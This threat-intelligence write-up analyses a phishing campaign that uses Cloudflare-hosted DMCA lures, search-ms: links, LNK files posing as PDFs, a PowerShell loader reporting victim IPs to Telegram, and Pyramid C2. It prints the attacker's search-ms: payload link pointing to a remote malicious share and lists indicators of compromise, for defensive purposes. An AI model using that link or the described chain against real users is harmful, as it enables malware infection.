Same Russian-Speaking Threat Actor, New Tactics: Abuse of Cloudflare Services for Phishing and Telegram to Filter Victim IPs

Published on

Published on

Published on

Apr 1, 2025

Apr 1, 2025

Apr 1, 2025

Russian-Speaking Threat Actor Abuses Cloudflare & Telegram in Phishing Campaign
Russian-Speaking Threat Actor Abuses Cloudflare & Telegram in Phishing Campaign
Russian-Speaking Threat Actor Abuses Cloudflare & Telegram in Phishing Campaign

Same Russian-Speaking Threat Actor, New Tactics: Abuse of Cloudflare Services for Phishing and Telegram to Filter Victim IPs

In a follow-up to our previously reported activity involving phishing lures impersonating the Electronic Frontier Foundation, Hunt.io researchers have observed a new wave of attacks attributed to the same Russian-speaking threat actor. This recent campaign leverages Cloudflare-branded phishing pages themed around DMCA (Digital Millennium Copyright Act) takedown notices served across multiple domains.

The lure abuses the ms-search protocol to download a malicious LNK file disguised as a PDF via a double extension. Once executed, the malware checks in with an attacker-operated Telegram bot-sending the victim's IP address-before transitioning to Pyramid C2 to control the infected host. This notable shift in tactics is likely due to increased scrutiny following the public spotlight on their activity.

This update covers the phishing lures, infrastructure, and recurring OPSEC lapses-most notably, open directories that continue to expose the actor's operations.

Discovery of Another Open Directory

Readers may remember that in our March 4th post, we used AttackCapture™ to identify the open directory. This time, we'll leverage the File Name feature to search for servers exposing files at the /documents/files/ path covered previously.

Figure 1 Hunt AttackCapture™ File Name search results for '/documents/files/'

Figure 1: Hunt AttackCapture™ File Name search results for '/documents/files/'

On March 24th, Hunt scans identified a new server at 104.245.241[.]157, which showed characteristics consistent with infrastructure previously attributed to the actor. Hosted on the Railnet LLC network, the server exposed ports 22, 80 (open directory), and 443. As we can see in the above screenshot, many of the file names were reused; however, the contents were changed.

Through additional scanning, we identified over 20 domains using the new open directory to download malicious files.

Cloudflare Pages.Dev & Workers.Dev Lures

The domains we observed all consisted of top-level domains of 'workers.dev' or 'pages.dev.' Cloudflare Pages allows developers to deploy static websites directly from repositories, while Workers enables serverless JavaScript execution. Both are commonly used for legitimate purposes but were abused to serve pages impersonating secure document sharing in this case.

Most web pages referenced cgtrader[.]com, an online marketplace for 3D models. As we previously discussed, the actor likely targeted individuals from a specific community, this time with a DMCA takedown notice, possibly attempting to pressure users under the guise of copyright enforcement.

A complete list of the domains we encountered can be found at the end of this post.

Figure 2: Example phishing page

Figure 2: Example phishing page.

Clicking the "Get Document" button initiates the download chain. The page displays a progress message intended to reinforce legitimacy:

"A Windows Explorer window will appear shortly. Click 'Open' and wait for the file to be retrieved from our secure server. Please wait, your document is being prepared. This will take no more than 30 seconds. This is a standard process for fast and safe document access!"

Reviewing the source code of the HTML reveals additional details about the infection chain.

Figure 3: Snippet of the HTML source from https://devgrid-72kx[.]pages[.]dev

Figure 3: Snippet of the HTML source from https://devgrid-72kx[.]pages[.]dev.

Beneath the interface, the site uses JavaScript to dynamically request a second-stage link from a Cloudflare Workers subdomain ( https[:]//idufgljr[.]procansopa1987[.]workers[.]dev/get-link). The response is a JSON payload containing a search-ms: protocol link:

{"link":"search-ms:query=references.pdf.&crumb=location:%5C%5C213.209.150.191@80%5Cdocuments%5Cfiles&displayname=Network"}

After URL decoding, this becomes:

search-ms:query=references.pdf.&crumb=location:\\213.209.150.191@80\documents\files&displayname=Network

This opens a File Explorer window titled "Network" and performs a search for references.pdf. within the remote share at \\213.209.150[.]191@80\documents\files. During dynamic analysis, we observed a decoy PDF opened in Microsoft Edge while the malicious LNK executes in the background, leading to infection without further user interaction.

The use of search-ms: allows threat actors to proxy requests to malicious content through legitimate system interfaces. While this technique is not new, it continues to evade detection in environments where protocol handlers like search-ms: are not monitored or restricted.

As of publication time, we could not extract additional details about 213.209.150[.]191, but the server plays a role in the attackers' delivery infrastructure.

File Analysis

The core infection chain observed in this campaign mirrors earlier activity attributed to the same actor. Execution begins with a Windows shortcut (.lnk) file masquerading as a PDF. When launched, the LNK executes a PowerShell script to download a ZIP archive from the actor's malicious infrastructure. The archive contains a legitimate python.exe binary alongside a malicious Python script, which is executed to establish communication with Pyramid C2.

While this delivery process remains consistent, several files within the open directory show incremental changes that we will discuss below.

Figure 4: Screenshot of the open directory at 104.245.241[.]157 in Hunt

Figure 4: Screenshot of the open directory at 104.245.241[.]157 in Hunt.


kozlina2.ps1

Out of all the files in the directory, kozlina2.ps1, a PowerShell loader responsible for initiating the second stage of the infection chain, caught our eye. This script is executed by references.pdf.lnk, the initial shortcut file delivered via the search-ms: lure.

Once executed, the script downloads a decoy PDF and ZIP archive from the open directory. The archive contains a legitimate python.exe binary, multiple dependency files, and a Python-based loader. Upon extraction, a shortcut to the Python script, which includes the Pyramid C2 config, is created and copied to the Windows startup folder to maintain persistence across system reboots.

Where things differ is the integration of Telegram. kozlina2.ps1 uses a hardcoded Telegram bot token and chat ID to send the external IP address of the infected host to the attacker using the Bot API. The IP is obtained via a call to the ip-api[.]com service.

Figure 5: Snippet of the PowerShell script, kozlina2.ps1

Figure 5: Snippet of the PowerShell script, kozlina2.ps1.

Due to the hardcoded credentials, we were able to pivot and gather limited details about the operators behind the channel.

The group title is " ПШ КОД ЗАПУСК", which translates from Russian to "PS CODE LAUNCH"-a likely reference to the kozlina2 script. Using the API metadata, researchers were able to identify the following accounts connected to the group:

  • @tyyndrabot - The bot used to receive IP addresses from infected hosts.

  • @pups2131 - The group's administrator.

  • Skandi - A group member; their role remains unknown at this time.

Figure 6: Screenshot from Telegram of the group tied to the malicious phishing attack

Figure 6: Screenshot from Telegram of the group tied to the malicious phishing attack.


kursor.py

The ZIP archive retrieved by kozlina.ps1 also contains kursor.py, a Python script functionally consistent with previous iterations covered in our earlier reporting. The script maintains the same role: decoding two configuration blocks that point to Pyramid C2 servers over port 443, including the previously identified 212.87.222[.]84 and the open directory server at 104.245.241[.]157.

Although the overall logic remains the same, the actor introduced an additional obfuscation step to the configuration information. In earlier versions, the configuration was base64-encoded and zlib-compressed, making decoding straightforward with tools like CyberChef.

The updated code now prepends five junk characters to the string before decoding begins. The reason for this is not immediately evident to us, but decoding is the same as the junk string is stripped prior to decoding/decompressing.

Figure 7: Screenshot of kursor.py showing the addition of junk characters to the configuration string

Figure 7: Screenshot of kursor.py showing the addition of junk characters to the configuration string.

Conclusion

This latest activity demonstrates the continued evolution of a previously reported Russian-speaking threat actor. While the overall delivery and malware execution processes remain the same, integrating Telegram-based IP reporting, additional obfuscation of Pyramid C2 configs, and using Cloudflare phishing lures reflect ongoing efforts to evade detection and frustrate analysis.

These incremental changes reinforce the importance of revisiting known tactics and infrastructure over time. Defenders should monitor for abuse of protocol handlers like search-ms: track open directories serving staged payloads, and remain alert to trusted services-such as Telegram and Cloudflare Workers-being used to mask early-stage activity.

Network Observables and Indicators of Compromise (IOCs)

IP AddressDomain(s)ASNNotes
104.245.241[.]157N/ARailnet LLCOpen directory located at /documents/files/
104.245.241[.]71N/ARailnet LLCPyramid C2
213.209.150[.]191N/ARailnet LLCPart of search-ms link hosting malicious files
172.67.176[.]118
104.21.40[.]53
idufgljr.procansopa1987[.]workers.devCloudflarePhishing pages ↓
172.66.44[.]148
172.66.47[.]108
dmca-hub-r2ao.pages[.]devCloudflare
172.66.44[.]162
172.66.47[.]94
rendernest-y4et.pages[.]devCloudflare
172.66.45[.]9
172.66.46[.]247
renderhub-5bam.pages[.]dev/james94.pdfCloudflare
172.66.44[.]95
172.66.47[.]161
devcloud-5lpl.pages[.]dev/tibiscui16.pdfCloudflare
172.66.44[.]87
172.66.47[.]169
cloudforge-g9gi.pages[.]dev/jewelry-3d-maker.pdfCloudflare
172.66.45[.]31
172.66.46[.]225
renderbase-tp71.pages[.]devCloudflare
172.66.44[.]215
172.66.47[.]41
renderbase-27s7.pages[.]dev/keremcal.pdfCloudflare
172.66.44[.]166
172.66.47[.]90
polybase-6e8v.pages.devCloudflare
104.21.112[.]1
104.21.16[.]1
devhub-dn06.pages.devCloudflare
172.66.44[.]94
172.66.47[.]162
cloudforge-p9cm.pages[.]devCloudflare
172.66.44[.]176
172.66.47[.]80
renderhub-30pd.pages.devCloudflare
172.66.44[.]165
172.66.47[.]91
devcore-2lef.pages[.]devCloudflare
172.66.47[.]78
172.66.44[.]178
rendernest-54x9.pages[.]devCloudflare
172.66.47[.]160
172.66.44[.]96
3dflow-85wo.pages[.]devCloudflare
172.66.45[.]11
172.66.46[.]245
devcloud-63gg.pages[.]devCloudflare
172.66.47[.]165
172.66.44[.]91
rendernest-en88.pages[.]devCloudflare
172.66.47[.]140
172.66.44[.]116
3dmeshhub-k35m.pages[.]devCloudflare
172.66.44[.]57
172.66.47[.]199
devgrid-1wsz.pages[.]devCloudflare
172.66.44[.]159
172.66.47[.]97
meshlinker-2imf.pages[.]devCloudflare
172.66.47[.]189
172.66.44[.]67
devcore-ec8q.pages[.]devCloudflare
172.66.45[.]28
172.66.46[.]228
devgrid-72kx.pages[.]devCloudflare
172.66.47[.]148
172.66.44[.]108
cloud3d-k5sa.pages.devCloudflare
172.66.46[.]230
172.66.45[.]26
3dlinker-gs9y.pages.devCloudflare

Host Observables and Indicators of Compromise (IOCs)

FilenameSHA-256
kozlina2.ps1b542033864dd09b2cff6ddec7f19ac480ab79e742481a14ae345051d323f58e7
references.pdf.lnkbf3b19c30085a9611650aa283856bf3defec894aae0b303ccf90244746127206
terms-of-service.pdf.lnk9103211fc44a4918591106e8bfa73c3d3cc1fa98512fa31aa87423f7a7c51825
kursor.pybe35ed6d513f06c1016a769ea6db7ee30a93b9a28ba39ecde832273833dc5b51
KursorResources.lnk3b45369da19e3c30e0baf15b3499d119cf812a0e6c2b37b64620340b27decbe3
KursorResources.zipd9afee5fc0039d6428ca7bc8d5e309cafdcd905b8e4d8843e6d21a89e2b25630

In a follow-up to our previously reported activity involving phishing lures impersonating the Electronic Frontier Foundation, Hunt.io researchers have observed a new wave of attacks attributed to the same Russian-speaking threat actor. This recent campaign leverages Cloudflare-branded phishing pages themed around DMCA (Digital Millennium Copyright Act) takedown notices served across multiple domains.

The lure abuses the ms-search protocol to download a malicious LNK file disguised as a PDF via a double extension. Once executed, the malware checks in with an attacker-operated Telegram bot-sending the victim's IP address-before transitioning to Pyramid C2 to control the infected host. This notable shift in tactics is likely due to increased scrutiny following the public spotlight on their activity.

This update covers the phishing lures, infrastructure, and recurring OPSEC lapses-most notably, open directories that continue to expose the actor's operations.

Discovery of Another Open Directory

Readers may remember that in our March 4th post, we used AttackCapture™ to identify the open directory. This time, we'll leverage the File Name feature to search for servers exposing files at the /documents/files/ path covered previously.

Figure 1 Hunt AttackCapture™ File Name search results for '/documents/files/'

Figure 1: Hunt AttackCapture™ File Name search results for '/documents/files/'

On March 24th, Hunt scans identified a new server at 104.245.241[.]157, which showed characteristics consistent with infrastructure previously attributed to the actor. Hosted on the Railnet LLC network, the server exposed ports 22, 80 (open directory), and 443. As we can see in the above screenshot, many of the file names were reused; however, the contents were changed.

Through additional scanning, we identified over 20 domains using the new open directory to download malicious files.

Cloudflare Pages.Dev & Workers.Dev Lures

The domains we observed all consisted of top-level domains of 'workers.dev' or 'pages.dev.' Cloudflare Pages allows developers to deploy static websites directly from repositories, while Workers enables serverless JavaScript execution. Both are commonly used for legitimate purposes but were abused to serve pages impersonating secure document sharing in this case.

Most web pages referenced cgtrader[.]com, an online marketplace for 3D models. As we previously discussed, the actor likely targeted individuals from a specific community, this time with a DMCA takedown notice, possibly attempting to pressure users under the guise of copyright enforcement.

A complete list of the domains we encountered can be found at the end of this post.

Figure 2: Example phishing page

Figure 2: Example phishing page.

Clicking the "Get Document" button initiates the download chain. The page displays a progress message intended to reinforce legitimacy:

"A Windows Explorer window will appear shortly. Click 'Open' and wait for the file to be retrieved from our secure server. Please wait, your document is being prepared. This will take no more than 30 seconds. This is a standard process for fast and safe document access!"

Reviewing the source code of the HTML reveals additional details about the infection chain.

Figure 3: Snippet of the HTML source from https://devgrid-72kx[.]pages[.]dev

Figure 3: Snippet of the HTML source from https://devgrid-72kx[.]pages[.]dev.

Beneath the interface, the site uses JavaScript to dynamically request a second-stage link from a Cloudflare Workers subdomain ( https[:]//idufgljr[.]procansopa1987[.]workers[.]dev/get-link). The response is a JSON payload containing a search-ms: protocol link:

{"link":"search-ms:query=references.pdf.&crumb=location:%5C%5C213.209.150.191@80%5Cdocuments%5Cfiles&displayname=Network"}

After URL decoding, this becomes:

search-ms:query=references.pdf.&crumb=location:\\213.209.150.191@80\documents\files&displayname=Network

This opens a File Explorer window titled "Network" and performs a search for references.pdf. within the remote share at \\213.209.150[.]191@80\documents\files. During dynamic analysis, we observed a decoy PDF opened in Microsoft Edge while the malicious LNK executes in the background, leading to infection without further user interaction.

The use of search-ms: allows threat actors to proxy requests to malicious content through legitimate system interfaces. While this technique is not new, it continues to evade detection in environments where protocol handlers like search-ms: are not monitored or restricted.

As of publication time, we could not extract additional details about 213.209.150[.]191, but the server plays a role in the attackers' delivery infrastructure.

File Analysis

The core infection chain observed in this campaign mirrors earlier activity attributed to the same actor. Execution begins with a Windows shortcut (.lnk) file masquerading as a PDF. When launched, the LNK executes a PowerShell script to download a ZIP archive from the actor's malicious infrastructure. The archive contains a legitimate python.exe binary alongside a malicious Python script, which is executed to establish communication with Pyramid C2.

While this delivery process remains consistent, several files within the open directory show incremental changes that we will discuss below.

Figure 4: Screenshot of the open directory at 104.245.241[.]157 in Hunt

Figure 4: Screenshot of the open directory at 104.245.241[.]157 in Hunt.


kozlina2.ps1

Out of all the files in the directory, kozlina2.ps1, a PowerShell loader responsible for initiating the second stage of the infection chain, caught our eye. This script is executed by references.pdf.lnk, the initial shortcut file delivered via the search-ms: lure.

Once executed, the script downloads a decoy PDF and ZIP archive from the open directory. The archive contains a legitimate python.exe binary, multiple dependency files, and a Python-based loader. Upon extraction, a shortcut to the Python script, which includes the Pyramid C2 config, is created and copied to the Windows startup folder to maintain persistence across system reboots.

Where things differ is the integration of Telegram. kozlina2.ps1 uses a hardcoded Telegram bot token and chat ID to send the external IP address of the infected host to the attacker using the Bot API. The IP is obtained via a call to the ip-api[.]com service.

Figure 5: Snippet of the PowerShell script, kozlina2.ps1

Figure 5: Snippet of the PowerShell script, kozlina2.ps1.

Due to the hardcoded credentials, we were able to pivot and gather limited details about the operators behind the channel.

The group title is " ПШ КОД ЗАПУСК", which translates from Russian to "PS CODE LAUNCH"-a likely reference to the kozlina2 script. Using the API metadata, researchers were able to identify the following accounts connected to the group:

  • @tyyndrabot - The bot used to receive IP addresses from infected hosts.

  • @pups2131 - The group's administrator.

  • Skandi - A group member; their role remains unknown at this time.

Figure 6: Screenshot from Telegram of the group tied to the malicious phishing attack

Figure 6: Screenshot from Telegram of the group tied to the malicious phishing attack.


kursor.py

The ZIP archive retrieved by kozlina.ps1 also contains kursor.py, a Python script functionally consistent with previous iterations covered in our earlier reporting. The script maintains the same role: decoding two configuration blocks that point to Pyramid C2 servers over port 443, including the previously identified 212.87.222[.]84 and the open directory server at 104.245.241[.]157.

Although the overall logic remains the same, the actor introduced an additional obfuscation step to the configuration information. In earlier versions, the configuration was base64-encoded and zlib-compressed, making decoding straightforward with tools like CyberChef.

The updated code now prepends five junk characters to the string before decoding begins. The reason for this is not immediately evident to us, but decoding is the same as the junk string is stripped prior to decoding/decompressing.

Figure 7: Screenshot of kursor.py showing the addition of junk characters to the configuration string

Figure 7: Screenshot of kursor.py showing the addition of junk characters to the configuration string.

Conclusion

This latest activity demonstrates the continued evolution of a previously reported Russian-speaking threat actor. While the overall delivery and malware execution processes remain the same, integrating Telegram-based IP reporting, additional obfuscation of Pyramid C2 configs, and using Cloudflare phishing lures reflect ongoing efforts to evade detection and frustrate analysis.

These incremental changes reinforce the importance of revisiting known tactics and infrastructure over time. Defenders should monitor for abuse of protocol handlers like search-ms: track open directories serving staged payloads, and remain alert to trusted services-such as Telegram and Cloudflare Workers-being used to mask early-stage activity.

Network Observables and Indicators of Compromise (IOCs)

IP AddressDomain(s)ASNNotes
104.245.241[.]157N/ARailnet LLCOpen directory located at /documents/files/
104.245.241[.]71N/ARailnet LLCPyramid C2
213.209.150[.]191N/ARailnet LLCPart of search-ms link hosting malicious files
172.67.176[.]118
104.21.40[.]53
idufgljr.procansopa1987[.]workers.devCloudflarePhishing pages ↓
172.66.44[.]148
172.66.47[.]108
dmca-hub-r2ao.pages[.]devCloudflare
172.66.44[.]162
172.66.47[.]94
rendernest-y4et.pages[.]devCloudflare
172.66.45[.]9
172.66.46[.]247
renderhub-5bam.pages[.]dev/james94.pdfCloudflare
172.66.44[.]95
172.66.47[.]161
devcloud-5lpl.pages[.]dev/tibiscui16.pdfCloudflare
172.66.44[.]87
172.66.47[.]169
cloudforge-g9gi.pages[.]dev/jewelry-3d-maker.pdfCloudflare
172.66.45[.]31
172.66.46[.]225
renderbase-tp71.pages[.]devCloudflare
172.66.44[.]215
172.66.47[.]41
renderbase-27s7.pages[.]dev/keremcal.pdfCloudflare
172.66.44[.]166
172.66.47[.]90
polybase-6e8v.pages.devCloudflare
104.21.112[.]1
104.21.16[.]1
devhub-dn06.pages.devCloudflare
172.66.44[.]94
172.66.47[.]162
cloudforge-p9cm.pages[.]devCloudflare
172.66.44[.]176
172.66.47[.]80
renderhub-30pd.pages.devCloudflare
172.66.44[.]165
172.66.47[.]91
devcore-2lef.pages[.]devCloudflare
172.66.47[.]78
172.66.44[.]178
rendernest-54x9.pages[.]devCloudflare
172.66.47[.]160
172.66.44[.]96
3dflow-85wo.pages[.]devCloudflare
172.66.45[.]11
172.66.46[.]245
devcloud-63gg.pages[.]devCloudflare
172.66.47[.]165
172.66.44[.]91
rendernest-en88.pages[.]devCloudflare
172.66.47[.]140
172.66.44[.]116
3dmeshhub-k35m.pages[.]devCloudflare
172.66.44[.]57
172.66.47[.]199
devgrid-1wsz.pages[.]devCloudflare
172.66.44[.]159
172.66.47[.]97
meshlinker-2imf.pages[.]devCloudflare
172.66.47[.]189
172.66.44[.]67
devcore-ec8q.pages[.]devCloudflare
172.66.45[.]28
172.66.46[.]228
devgrid-72kx.pages[.]devCloudflare
172.66.47[.]148
172.66.44[.]108
cloud3d-k5sa.pages.devCloudflare
172.66.46[.]230
172.66.45[.]26
3dlinker-gs9y.pages.devCloudflare

Host Observables and Indicators of Compromise (IOCs)

FilenameSHA-256
kozlina2.ps1b542033864dd09b2cff6ddec7f19ac480ab79e742481a14ae345051d323f58e7
references.pdf.lnkbf3b19c30085a9611650aa283856bf3defec894aae0b303ccf90244746127206
terms-of-service.pdf.lnk9103211fc44a4918591106e8bfa73c3d3cc1fa98512fa31aa87423f7a7c51825
kursor.pybe35ed6d513f06c1016a769ea6db7ee30a93b9a28ba39ecde832273833dc5b51
KursorResources.lnk3b45369da19e3c30e0baf15b3499d119cf812a0e6c2b37b64620340b27decbe3
KursorResources.zipd9afee5fc0039d6428ca7bc8d5e309cafdcd905b8e4d8843e6d21a89e2b25630

Related Posts:

Exposing the Deception: Russian EFF Impersonators Behind Stealc & Pyramid C2
Mar 4, 2025

Discover how an open directory exposed a threat actor impersonating EFF to target gamers and how we mapped their infrastructure to Stealc & Pyramid C2.

Exposing the Deception: Russian EFF Impersonators Behind Stealc & Pyramid C2
Mar 4, 2025

Discover how an open directory exposed a threat actor impersonating EFF to target gamers and how we mapped their infrastructure to Stealc & Pyramid C2.

Tracking Pyramid C2: Identifying Post-Exploitation Servers in Hunt
Feb 12, 2025

Discover how Pyramid, an open-source tool, enables post-exploitation. Learn detection methods using HTTP headers and recent findings in Hunt.

Tracking Pyramid C2: Identifying Post-Exploitation Servers in Hunt
Feb 12, 2025

Discover how Pyramid, an open-source tool, enables post-exploitation. Learn detection methods using HTTP headers and recent findings in Hunt.

 Uncovering Threat Actor Tactics: How Open Directories Provide Insight into XWorm Delivery Strategies
Nov 28, 2024

Learn how threat actors leverage open directories to deliver XWorm malware disguised as popular software, providing insight into their tactics.

 Uncovering Threat Actor Tactics: How Open Directories Provide Insight into XWorm Delivery Strategies
Nov 28, 2024

Learn how threat actors leverage open directories to deliver XWorm malware disguised as popular software, providing insight into their tactics.

Exposing the Deception: Russian EFF Impersonators Behind Stealc & Pyramid C2
Mar 4, 2025

Discover how an open directory exposed a threat actor impersonating EFF to target gamers and how we mapped their infrastructure to Stealc & Pyramid C2.

Tracking Pyramid C2: Identifying Post-Exploitation Servers in Hunt
Feb 12, 2025

Discover how Pyramid, an open-source tool, enables post-exploitation. Learn detection methods using HTTP headers and recent findings in Hunt.

 Uncovering Threat Actor Tactics: How Open Directories Provide Insight into XWorm Delivery Strategies
Nov 28, 2024

Learn how threat actors leverage open directories to deliver XWorm malware disguised as popular software, providing insight into their tactics.